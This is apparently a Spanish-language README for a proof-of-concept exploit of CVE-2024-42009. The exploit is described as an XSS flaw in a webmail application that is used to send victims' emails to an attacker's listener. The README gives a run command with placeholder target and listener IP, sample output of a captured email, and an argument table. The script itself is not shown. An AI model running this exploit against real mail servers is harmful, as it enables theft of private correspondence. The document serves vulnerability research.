
Esta Prueba de Concepto (PoC) demuestra un exploit para CVE-2024-42009, aprovechando una vulnerabilidad de cross-site scripting (XSS) para extraer correos electrónicos de una aplicación de webmail objetivo. El ataque inyecta un payload malicioso que exfiltra el contenido de los correos electrónicos hacia un listener controlado por el atacante.
Esta Prueba de Concepto (PoC) demuestra un exploit para CVE-2024-42009, aprovechando una vulnerabilidad de cross-site scripting (XSS) para extraer correos electrónicos de una aplicación de webmail objetivo. El ataque inyecta una carga maliciosa que extrae el contenido del correo a un listener controlado por el atacante.
pip install requests beautifulsoup4
Ejecute el script con los argumentos necesarios:
python exploit.py -fu [email protected] -tu [email protected] -u http://target.com/contact -ip YOUR_IP -p 1337
[*] CVE-2024-42009 PoC: Listening on 192.168.1.100:1337...
[*] Sending payload for UID 1...
[+] Payload sent for UID 1 (Status: 200)
[+] Captured Email Content:
Hello, this is a test email!
No reclamo crédito/propiedad/revelación de la vulnerabilidad ni de todos los exploits correspondientes alojados en este repositorio de GitHub - Todo el crédito es para el investigador que la descubrió; solo creé una PoC para replicar la vulnerabilidad basándome en datos de internet. Esta PoC es solo con fines educativos y de investigación. ¡Las pruebas no autorizadas contra sistemas sin consentimiento son ilegales. Úselo de manera responsable!
| Argumento | Descripción |
|---|
-fu, --from-user | La dirección de correo del remitente |
-tu, --to-user | La dirección de correo del destinatario |
-u, --target-url | La URL de webmail objetivo |
-ip, --server-ip | La dirección IP del listener del atacante |
-p, --server-port | El puerto para el listener (por defecto: 1337) |